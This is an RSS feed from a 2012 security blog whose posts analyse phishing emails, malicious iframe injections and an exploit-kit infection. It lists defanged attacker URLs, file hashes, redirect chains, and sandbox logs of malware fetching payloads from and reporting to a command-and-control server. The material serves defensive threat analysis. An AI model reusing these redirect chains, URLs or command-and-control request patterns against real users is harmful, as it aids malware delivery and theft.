NoVirusThanks Blog http://blog.novirusthanks.org Security News and Malware Analysis Thu, 23 Feb 2012 11:11:46 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 NoVirusThanks_Bloghttp://feedburner.google.com Phishing: Compromised Account (PayPal) http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/ http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/#comments Thu, 23 Feb 2012 11:11:46 +0000 admin http://blog.novirusthanks.org/?p=3211 We received another suspicious email that spreads a phishing URL:

Phishing Email

The A HREF link redirects to the phishing URL:

hxxp:// restore.account.sysadmin-center .com/paypal/restore/webscrcmd=_login-run/webscrcmd=_account-run/confirm-paypal/restore=_paypal-account/updates-paypal/

Email header details:

Received: from main.pensativo.nl (main.benefiet.eu [141.138.139.44])
Received: from [202.175.132.8] (helo=administrator) by main.pensativo.nl with esmtpa (Exim 4.77)
From: "Paypal Department"
Subject: Compromised Account
Date: Thu, 23 Feb 2012 15:55:40 +1300
To: undisclosed-recipients:;
]]> http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/feed/ 0 Phishing: Skype Incident Updating Your Information To the new security http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/ http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/#comments Thu, 16 Feb 2012 14:17:15 +0000 admin http://blog.novirusthanks.org/?p=3208 New phishing email used to steal Skype login details:

Phishing Email

The A HREF link:

Please click here to verify your identity

Redirects users to the malicious URL:

hxxp://login.skype.com.kad-s .com/
]]> http://blog.novirusthanks.org/2012/02/phishing-skype-incident-updating-your-information-to-the-new-security/feed/ 0 Find out who visits your Facebook profile: it is a fake, the link redirects to malicious websites http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/ http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/#comments Tue, 14 Feb 2012 00:44:02 +0000 admin http://blog.novirusthanks.org/?p=3199 We have noted recently various messages posted by Facebook users that promote few methods to find out who visits your Facebook profile. At the end of the message there is a link to a Bit.ly shortened URL, as you can see from this image:

Facebook Dangerous URL

The shortened URL redirects the users to a malicious URL:

HTTP/1.1 301 Moved
Server: nginx
Date: Mon, 13 Feb 2012 23:18:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _bit=4f399a30-002d0-041e9-281cf10a;domain=.bit.ly;expires=Sat Aug 11 23:18:08 2012;path=/; HttpOnly
Cache-control: private; max-age=90
Location: hxxp:// pabulums .info/nukiy.bnw
MIME-Version: 1.0
Content-Length: 122

Extracted malicious URL:

hxxp:// pabulums .info/nukiy.bnw

Domain details:

The website pabulums .info is hosted at SingleHop and its current IP address is 184.154.106.126 (r90.servebyte.com). The server machine is located in – (-) and in the same server there are hosted other 1 websites. The domain is registered with the suffix INFO and the name pabulums. The organization is Servebyte.

URLVoid report:

http://urlvoid.com/scan/pabulums.info

When the malicious URL is visited, there is a new redirect:

HTTP/1.1 302 OK
Date: Mon, 13 Feb 2012 23:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: hxxp:// alexins .co.cc/170588/nukiy.bnw
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 786

Extracted malicious URL:

hxxp:// alexins .co.cc/170588/nukiy.bnw

Domain details:

The website alexins .co.cc is hosted at SingleHop and its current IP address is 184.154.106.125 (r90.servebyte.com). The server machine is located in – (-) and in the same server there are hosted other 1 websites. The domain is registered with the suffix CO.CC and the name alexins. The organization is Servebyte.

URLVoid report:

http://urlvoid.com/scan/alexins.co.cc

Remember to do not click in unknown URLs, posted by known and unknown Facebook users, even if they are in your friends list. Most of the Facebook virus can hijack with javascript the login session and they can automatically put “Likes” on malicious Facebook pages or they can post a message containing malicious link in your profile or in the profile of all your friends, so pay attention when you click with the mouse!

]]> http://blog.novirusthanks.org/2012/02/find-out-who-visits-your-facebook-profile-it-is-a-fake-the-link-redirects-to-malicious-websites/feed/ 0 Malware: Cotacao solicitada (relatorio.scr) http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/ http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/#comments Sun, 12 Feb 2012 14:07:39 +0000 admin http://blog.novirusthanks.org/?p=3187 We have received a suspicious email:

Received: from unknown (HELO userb) (***@globaltires.es@177.0.120.119)
Subject: Cotacao solicitada.
MIME-Version: 1.0
Date: Sat, 11 Feb 2012 17:56:37 -0300

Email message is in HTML and the page source looks like:

HTML Page Source

As you can see, from this code:

<A href="hxxp://groupnetvect .co.de">relatorio1379-pdf.</A> (63kb)<BR>

The A HREF link redirects the user to an external (malicious) website:

hxxp://groupnetvect .co.de

Domain details:

The website groupnetvect .co.de is hosted at Hetzner Online AG and its current IP address is 78.46.102.86 (www8.subdomain.com). The server machine is located in Germany (DE) and in the same server there are hosted other 1 websites. The domain is registered with the suffix CO.DE and the name groupnetvect. The organization is Hetzner Online AG.

URLVoid report:

http://www.urlvoid.com/scan/roupnetvect .co.de

HTTP response:

HTTP/1.1 302 Found
Date: Sun, 12 Feb 2012 13:01:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Location: hxxp:// consumer-electronics .junderhilltherapy .com//wp-content/themes/aurora/options-link.php
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html; charset=iso-8859-1

The user is redirected again to another external (malicious) link:

hxxp:// consumer-electronics .junderhilltherapy .com//wp-content/themes/aurora/options-link.php

Domain details:

The website consumer-electronics .junderhilltherapy .com is hosted at HostDime.com and its current IP address is 66.7.193.50 (west.superdomainzone.com). The server machine is located in United States (US) and in the same server there are hosted other 1 websites. The domain is registered with the suffix COM and the name junderhilltherapy. The organization is HostDime.com.

URLVoid report:

http://www.urlvoid.com/scan/consumer-electronics .junderhilltherapy .com

HTTP response:

HTTP/1.1 200 OK
Date: Sun, 12 Feb 2012 13:03:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename="relatorio.scr"
Connection: close
Content-Type: application/log

Now we can see that a file “relatorio.scr” is prompted to be downloaded:

Malicious SCR File

File details:

File: relatorio_scr
Size: 23042 bytes
MD5: BFE2E1EB1C8780149C40FAE98C353BCA
SHA1: 4C69371B15E9738FC663A381C1841315FAC030A0
SHA256: 2DF1080C551E9603F2B8F197DE62D4A643B12BF31F6D3CEE47C0649037C51CF6
SHA384: E30FBFFAD035E7F35BA62B4C6689438ED9A66C3D2F494F4896387EE89C63E445F9AA07FF0D0BF4D1C84EAE282D3F5040
SHA512: 8D9D7B7D4FBF3ACBF984B88CB027D44E98EE997915E2823D61A882B1FDD6D7DD4F5630B518D2C602649D4D42D74DAF863804924D57AC30E8B0D33161D31F706C

The file is detected by Antivirus as Suspect.Trojan.Generic.FD-1 (ClamAV), Trojan-Banker.Win32.VB!IK (Emsisoft), Trojan-Banker.Win32.VB (Ikarus).

]]> http://blog.novirusthanks.org/2012/02/malware-cotacao-solicitada/feed/ 0 New Malicious Iframe Code, Trojan.Java.Downloader and VBScript http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/ http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/#comments Sat, 04 Feb 2012 18:01:41 +0000 admin http://blog.novirusthanks.org/?p=3164 Honeypots have reported another case of malicious iframe code that is generally added after the end of the HTML tag, at the end of the website page, as you can see from the image below:

Malicious Iframe Code

We have also noted another website that redirects users to a fake porn video streaming website with the main objective to install a VBScript (using a Java applet downloader) in the user’s system and use cmd.exe to download and execute a keylogger:

hxxp:// habbo-sluts-exposed .tk

The URL uses an iframe code to redirect the users to another website:

Iframe Code

Extracted malicious URL:

hxxp:// b0ss.getenjoyment .net/two/

And now, there is another redirect:

<html>
 <head>
  <title> Please wait while the application is loading...</title>
  <meta http-equiv="refresh" content="5;url=index2.html">
  <style type=text/css>

Note the code:

  <meta http-equiv="refresh" content="5;url=index2.html">

The user is now redirected to:

hxxp:// b0ss.getenjoyment .net/two/index2.html

The new URL contains the malicious VBScript:

VB Script

Download the dumped malicious code (pass is novirusthanks.org):
malicious_code.zip / 1 KB

With a malicious Java file that is probably used to download the VBScript:

File: Client.jar
Size: 2337 bytes
MD5 Hash: A6091A6335EC1FD34E8358010C044270
SHA1 Hash: 126BEED0FCE70142207DE46D58C69AADFF71645C
SHA256 Hash: 160D60C071F7A5E691C9B2537FCFA926EB9A80537D594B2E7382309E2ECD5F41
SHA384 Hash: EE4C9AC074E2B1FA5A2A28D586441008FA52FE2258DEF88AD39D4CBDA83934334FF7B4B16ABF85C44FAC565BB698B917
SHA512 Hash: EC422053D1852A1FD575485C8C8BFDF51C35347EBFED92A0A613854717EEE5933C6520936D7CE5FAA67B60A31DDC0D09F1B167EFA975D2CD9D814B51D09AB46D

Antivirus scan report:

Antivirus report

As we can see from:

Executable File Download

The script download and execute the malicious PE file located at:

hxxp:// b0ss.getenjoyment .net/boss.exe

File details:

File: boss.exe
Size: 1280512 bytes
MD5 Hash: C01246B6507DED92832F8A71BF1CDA2D
SHA1 Hash: 792BB694A5944B4CF70DA803586F8440C7AD1D30
SHA256 Hash: 0C3E7B048309541BE48A2F716BEFC91C90F27409B8BF0E3767F0C4CF8C8435AF
SHA384 Hash: 66EC0E377A78EB1EDCF63A26FA8C8E996D89A91CDCC034B507E1098592BB9E67C5C24F4AE9287AD421335D05311EF0A5
SHA512 Hash: ADF7AB9E2E05B788269C7B0FA46660687C868ED131162FDB29824DA54A8AC3C67F53962D43B900D8FFBC61050ADA46E53DFBA846C16461AD18E9703AA3ACEF02

Antivirus scan report:

Antivirus Report

]]> http://blog.novirusthanks.org/2012/02/new-malicious-iframe-code-trojan-java-downloader-and-vbscript/feed/ 0 JavaScript Code Hidden in Image http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/ http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/#comments Wed, 01 Feb 2012 13:28:49 +0000 admin http://blog.novirusthanks.org/?p=3157 We noted few websites infected with the following code (Gumblar-style?):

Image

Extracted malicious URL:

hxxp://vohfakai .co.cc/1584179.jpg

URLVoid report:

http://www.urlvoid.com/scan/vohfakai.co.cc

Unfortunately (fortunately) the malicious URL is not online, but I am sure it was used to spread malicious javascript code or iframe code, that would have redirected the users to an exploit kit.

]]> http://blog.novirusthanks.org/2012/02/javascript-code-hidden-in-image/feed/ 0 Iframe Alias(dot)jjbworks(dot)com Mass Infection http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/ http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/#comments Tue, 31 Jan 2012 14:20:02 +0000 admin http://blog.novirusthanks.org/?p=3148 Another hidden and malicious iframe is spreading by infecting websites:

Image

The iframe code is added before the BODY tag of the HTML page and is obfuscated:

Image

The extracted malicious link is:

hxxp://alias .jjbworks .com/analytics.php

Details about the malicious domain:

Website: alias .jjbworks .com
Domain Hash: 2f8f518cb5d452fca78b8c11b3a53913
IP Address: 68.68.20.114 [SCAN]
IP Hostname: 68.68.20.114.customer.bluemilenetworks.com
IP Country: -- (--)
AS Number: 11013
AS Name: BLUE-AS - Bluemile, Inc

URLVoid report:

http://www.urlvoid.com/scan/alias.jjbworks.com

Websites infected with this malicious code:

sosumo .net

URLVoid report:

http://www.urlvoid.com/scan/sosumo.net

]]> http://blog.novirusthanks.org/2012/01/iframe-aliasdotjjbworksdotcom-mass-infection/feed/ 0 Iframe Bigdeal777(dot)com Mass Infection http://blog.novirusthanks.org/2012/01/iframe-bigdeal777dotcom-mass-infection/ http://blog.novirusthanks.org/2012/01/iframe-bigdeal777dotcom-mass-infection/#comments Tue, 31 Jan 2012 13:48:04 +0000 admin http://blog.novirusthanks.org/?p=3139 Internal honeypots have reported a lot of websites infected with a hidden and malicious iframe code that is added at the end of the HTML tag or before the BODY tag of the page, the malicious iframe looks like this:

Image

Download the iframe code (pass is novirusthanks.org):

iframe.zip / 1 KB

Here is a small list of websites infected with this malicious code:

angelofdeath .pl
megavid .pl
invertus .lt
gelincikgiyim .de
ganacarne .com
strekowagora .cba .pl
nurevi .net
bijoux-fantaisie-online .com
f4c-test .1gb .ru
die-baurs .info
trenuje24 .pl
satalbak .com

Details about the malicious domain:

Website: bigdeal777 .com
Domain Hash: c87366528f961835580ae7c78f4a8903
IP Address: 178.63.141.211
IP Hostname: static.211.141.63.178.clients.your-server.de
IP Country: -- (--)
AS Number: 24940
AS Name: HETZNER-AS Hetzner Online AG RZ
Organization: serveradmin.pl S.C.

URLVoid report:

http://www.urlvoid.com/scan/bigdeal777.com

]]> http://blog.novirusthanks.org/2012/01/iframe-bigdeal777dotcom-mass-infection/feed/ 0 Preventsweating.com infected by Incognito Exploit Kit http://blog.novirusthanks.org/2012/01/preventsweating-com-infected-by-incognito-exploit-kit/ http://blog.novirusthanks.org/2012/01/preventsweating-com-infected-by-incognito-exploit-kit/#comments Tue, 31 Jan 2012 01:11:15 +0000 admin http://blog.novirusthanks.org/?p=3124 Our honeypot has logged an infected website:

hxxp://www.preventsweating .com

The malicious javascript code is at the end of the page:

Image

Download dumped content (pass is novirusthanks.org):
exploit.zip / 1 KB

We have analyzed the infected website with our sandbox and we can see from the network traffic that the obfuscated javascript code redirects users to the Incognito Exploit Kit url that is used to exploit a Java vulnerability and to infect the user PC with the payload setup.exe.

The malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:19 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=e7246650.jar
 
PK........Ó¸=@..

File details:

File: e7246650.jar
Size: 11864 bytes
MD5 Hash: 6CA56D1DF8E07747E3FCC2B090B784CF
SHA1 Hash: 1C71A325AA8A42633634084D6406816963848ADC
SHA256 Hash: 2B863CFD204781DB5EA4AD42AA39EF97DBC0D294DD13DC86904A04DE215B560A
SHA384 Hash: AF8B8A2FB3107A2EEDCC559A8E2AA4350FD8CBCDBA0E3D08B10AC9CD49A8002997812C9B2D1015E92F98A7A7779FA10A
SHA512 Hash: 4FB8AA0F57D5FF66922741295DF6E66825E18CCB6E182F94D5498C193611E2B1975BDE7C2FD7B70FFFF3323D45EAB4CF3132D696D9A3A42AE225E1DD58223A8B

Note that the .JAR file can be downloaded only using:

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13

The payload is downloaded:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:21 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 19968
Content-Disposition: inline; filename=setup.exe

File details:

File: setup.exe
Size: 19968 bytes
MD5 Hash: 53C8A9B30801AA54B91F2998BB541830
SHA1 Hash: 88AD96FE946428CF1784455F4A31D146236942CE
SHA256 Hash: 44FF06AA29B35E73CC31FBD63C02919C368EC967523E1C573047F4053561B313
SHA384 Hash: 812C0496FCAE403A4D541BEA5CBF5D5FC58A43BC872B1BC5C76DB1B76986502A57FF11104145EAF6F356BC089754BCAF
SHA512 Hash: 8184FD20E81CD4C0635F81518F53D7697A3412AA5C8B8F355EF739BFC1769E3DB0143344A109671C301D689CDDE7CE8581DC921E3808DFA81A4F9DFD349D73B6

Another malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=7c11db5a.jar

File details:

File: 7c11db5a.jar
Size: 16412 bytes
MD5 Hash: 45506395884D542068FCD39AB63157DD
SHA1 Hash: C8B351A83997D9EB5B0473072EA165949A94576C
SHA256 Hash: FF1A8129802655FD1E45A29B2329159A2AFC40BBCCB2AD2ED073C94ED228E98E
SHA384 Hash: 9B7A6C95D67A6BBBDAFB6C36552FF1A8E219A8298D76C8AE379F5CDA96391D2AC6B3733FF26032DCE99DC3355AC75284
SHA512 Hash: 0CDC120ADF5A425611880FCB86ACD34F2BC79B7F5CF354E71A43D2EBAFCCAD3D78E6373CB5073CA71C695C71392D26640E231C6FFFCC4E01207173971F47F043

Other HTTP GET requests:

GET /net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /com.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl

An executable file is downloaded (and executed) from the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777 HTTP/1.1
Host: hotlupdate .ru
 
HTTP/1.1 200 OK
Date: Mon, 30 Jan 2012 23:38:47 GMT
Server: Apache/2.2.21 (CentOS)
X-Powered-By: PHP/5.3.9
Cache-Control: public
Content-Disposition: attachment; filename=243
Content-Transfer-Encoding: binary
Content-Length: 218112
Connection: close
Content-Type: application/octet-stream
 
MZ.........ÿÿ..

The malware sends data (run=ok) to the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777&run=ok HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotlupdate .ru

The malware retrieves other commands from the C&C server:

POST /cc/index.php HTTP/1.0
Host: hotlupdate .ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
cmd=grab&data=&login=72F46C46959F9B3F2

And:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=1&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=2&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=3&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=4&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=5&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=6&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=7&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=8&sel=77777 HTTP/1.1

Another file is downloaded from the Incognito Exploit Kit URL:

GET /showthread.php?t=132357 HTTP/1.1
User-Agent: User-Agent: Opera/10.60 Presto/2.2.30
Host: pringcreek.osa .pl
Cache-Control: no-cache
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:41:01 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 847872
Content-Disposition: inline; filename=windows-update-sp4-kb76758-setup.exe

Then we can see network traffic on the remote TCP port 34356:

Remote Address    : 69.142.195.117
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 69.14.13.29
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 99.101.74.204
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 76.117.36.145
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes

We can see a connection to the legit maxmind.com service:

GET /app/geoip.js HTTP/1.0
Host: j.maxmind .com
Connection: close

The request is used to grab details about the victom’s IP address.

Another connection:

GET /geo/txt/city.php HTTP/1.0
Host: promos.fling .com
Connection: close

And now the malware starts to visit porn websites:

GET /gabi/s.php?id=103 HTTP/1.1
Host: phatcutie .com
 
GET /images/b.php?id=103 HTTP/1.1
Host: oneathleticmom .com

Here there is the (partial) extracted sandbox activity:

Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=49281
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=83475
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache398678090053612628.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache1046982269622246314.tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache398678090053612628.tmp - 45506395884D542068FCD39AB63157DD - 16412 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache1046982269622246314.tmp - 6CA56D1DF8E07747E3FCC2B090B784CF - 11864 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache398678090053612628.tmp - 45506395884D542068FCD39AB63157DD - 16412 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache1046982269622246314.tmp - 6CA56D1DF8E07747E3FCC2B090B784CF - 11864 bytes - attr: [-normal] - -
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /com.class
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=2
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /edu.class
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache6018828398565894530.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jika0.22284718957661265.exe
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /net.class
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jika0.22284718957661265.exe - F33E22CD5DF84623F90E4248602B6BB8 - 3743 bytes - attr: [] - -
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /org.class
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=3
File Deleted - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 19968 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache482471531546092118.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\oleda0.465072127781617.exe
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\7\6e422d47-1d1e469a-temp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\lastAccessed - 5058F1AF8388633F609CADB75A75DC9D - 1 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 253355E476CBBD461359962E8011B601 - 7839 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 253355E476CBBD461359962E8011B601 - 11935 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\oleda0.465072127781617.exe - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [] - -
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jika0.22284718957661265.exe - Twain Working Group - 517218B3A72016EE04208AAED408240F - 19968 bytes
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\regsvr32.exe - Microsoft Corporation - FBDB9D0935B9907B809B381FDDF1627F - 11776 bytes
File Deleted - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 19968 bytes
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\oleda0.465072127781617.exe - Twain Working Group - 517218B3A72016EE04208AAED408240F - 19968 bytes
Connection Established - %Temp%\jika0.22284718957661265.exe - TCP - 95.163.67.189 - 80
Web Request - %Temp%\jika0.22284718957661265.exe - GET - pringcreek.osa .pl - /showthread.php?t=132357
File Modified - %Temp%\jika0.22284718957661265.exe - %AppData%\LOCALS~1\Temp\~!#3.tmp
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#3.tmp - 735C39079BF4B1E4A94F53B1CD8D4B8D - 24576 bytes - attr: [-hidden] - PE
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#4.tmp - B8BDF98CC3830AEAB62C5AF7C8DB21E6 - 338470 bytes - attr: [-normal] - PE
Process Created - %Temp%\~!#3.tmp - C:\WINDOWS\system32\svchost.exe - Microsoft Corporation - 27C6D03BCDB8CFEB96B716F3D8BE3E18 - 14336 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\~!#3.tmp - 24576 bytes
Process Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#4.tmp - Unknown Publisher - B8BDF98CC3830AEAB62C5AF7C8DB21E6 - 338470 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 91.196.216.58 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getgrab
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777
File Modified - C:\WINDOWS\system32\svchost.exe - %AppData%\LOCALS~1\Temp\5.tmp
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\243[1] - 0DC10D843DADB4CBAE7B31B126F89567 - 191225 bytes - attr: [] - PE
Process Created - C:\WINDOWS\system32\svchost.exe - %Temp%\5.tmp - Unknown Publisher - 04E875E00F55525199B0952660580A80 - 218112 bytes
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777&run=ok
Web Request - C:\WINDOWS\system32\svchost.exe - POST - hotlupdate .ru - /cc/index.php
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=1&sel=77777
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=2&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\7.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\G55SBTS1\index[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\8.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=3&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\8.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\index[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\9.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=4&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\9.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\VBPHH91D\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\A.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=5&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\A.tmp - 0 bytes
